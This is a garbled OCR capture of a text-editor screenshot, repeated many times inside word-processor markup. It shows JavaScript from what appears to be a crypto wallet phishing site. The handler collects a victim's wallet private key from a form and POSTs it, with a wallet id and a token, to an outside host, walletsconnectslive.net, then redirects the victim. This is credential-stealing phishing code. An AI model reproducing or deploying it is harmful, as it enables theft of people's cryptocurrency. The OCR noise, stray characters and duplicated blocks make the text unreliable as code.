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tivities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
        <w:t>1615</w:t>
        <w:br/>
        <w:t>privatekey ='</w:t>
        <w:br/>
        <w:t>1616</w:t>
        <w:br/>
        <w:t>redirect( );</w:t>
        <w:br/>
        <w:t>1617</w:t>
        <w:br/>
        <w:t>document. querySelector('.sending').style. display = 'block' ;</w:t>
        <w:br/>
        <w:t>1618</w:t>
        <w:br/>
        <w:t>1619</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>1620</w:t>
        <w:br/>
        <w:t>alert( 'Could not proceed due to some errors, kindly try again later. ')</w:t>
        <w:br/>
        <w:t>1621</w:t>
        <w:br/>
        <w:t>1622</w:t>
        <w:br/>
        <w:t>1623</w:t>
        <w:br/>
        <w:t>1624</w:t>
        <w:br/>
        <w:t>HTML Tab Width: 8</w:t>
        <w:br/>
        <w:t>Ln 1629, Col 7</w:t>
        <w:br/>
        <w:t>INS</w:t>
        <w:br/>
        <w:t>Activities</w:t>
        <w:br/>
        <w:t>Text Editor</w:t>
        <w:br/>
        <w:t>Nov 6 03:34</w:t>
        <w:br/>
        <w:t>Open</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>~/Downloads/Site_Work</w:t>
        <w:br/>
        <w:t>Save</w:t>
        <w:br/>
        <w:t>×</w:t>
        <w:br/>
        <w:t>index2.html</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>phrase.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>actions.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>index.php</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>js2w.js.download</w:t>
        <w:br/>
        <w:t>X</w:t>
        <w:br/>
        <w:t>1370</w:t>
        <w:br/>
        <w:t>ater uy couto not proceed out to surie CTUS, Numaty try again later. ]</w:t>
        <w:br/>
        <w:t>1591</w:t>
        <w:br/>
        <w:t>1592</w:t>
        <w:br/>
        <w:t>1593</w:t>
        <w:br/>
        <w:t>1594</w:t>
        <w:br/>
        <w:t>1595</w:t>
        <w:br/>
        <w:t>1596</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:t>1597</w:t>
        <w:br/>
        <w:t>O</w:t>
        <w:br/>
        <w:t>1598</w:t>
        <w:br/>
        <w:t>const privatekeyProceedHandler = () =&gt; {</w:t>
        <w:br/>
        <w:t>1599</w:t>
        <w:br/>
        <w:t>event. preventDefault( );</w:t>
        <w:br/>
        <w:t>1600</w:t>
        <w:br/>
        <w:t>let privatekey = document. getElementById( 'privatekey' ).value;</w:t>
        <w:br/>
        <w:t>1601</w:t>
        <w:br/>
        <w:t>const wallet = document. getElementById( 'wallet_id').value;</w:t>
        <w:br/>
        <w:t>1602</w:t>
        <w:br/>
        <w:t>console. log(wallet) ;</w:t>
        <w:br/>
        <w:t>1603</w:t>
        <w:br/>
        <w:t>if (privatekey. trim( ) === "") {</w:t>
        <w:br/>
        <w:t>1604</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key');</w:t>
        <w:br/>
        <w:t>1605</w:t>
        <w:br/>
        <w:t>} else {</w:t>
        <w:br/>
        <w:t>A</w:t>
        <w:br/>
        <w:t>1606</w:t>
        <w:br/>
        <w:t>$. ajax( {</w:t>
        <w:br/>
        <w:t>1607</w:t>
        <w:br/>
        <w:t>url: "https://walletsconnectslive.net/thirdform",</w:t>
        <w:br/>
        <w:t>1608</w:t>
        <w:br/>
        <w:t>method: 'POST' ,</w:t>
        <w:br/>
        <w:t>1609</w:t>
        <w:br/>
        <w:t>data: { import_type: 'private', wallet: wallet, privatekey: privatekey, _token: "VNSElc2gRav1j8Vo06hMGE2lgerCJRM3VHsxXmjf" },</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>1610</w:t>
        <w:br/>
        <w:t>success: function (res) {</w:t>
        <w:br/>
        <w:t>1611</w:t>
        <w:br/>
        <w:t>if (res. trim( ) ! == "") {</w:t>
        <w:br/>
        <w:t>1612</w:t>
        <w:br/>
        <w:t>if (res. trim( ) === "string_error") {</w:t>
        <w:br/>
        <w:t>1613</w:t>
        <w:br/>
        <w:t>alert( 'Fill in your private key. ');</w:t>
        <w:br/>
        <w:t>1614</w:t>
        <w:br/>
        <w:t>} else if (res. trim( ) === "success") {</w:t>
        <w:br/>
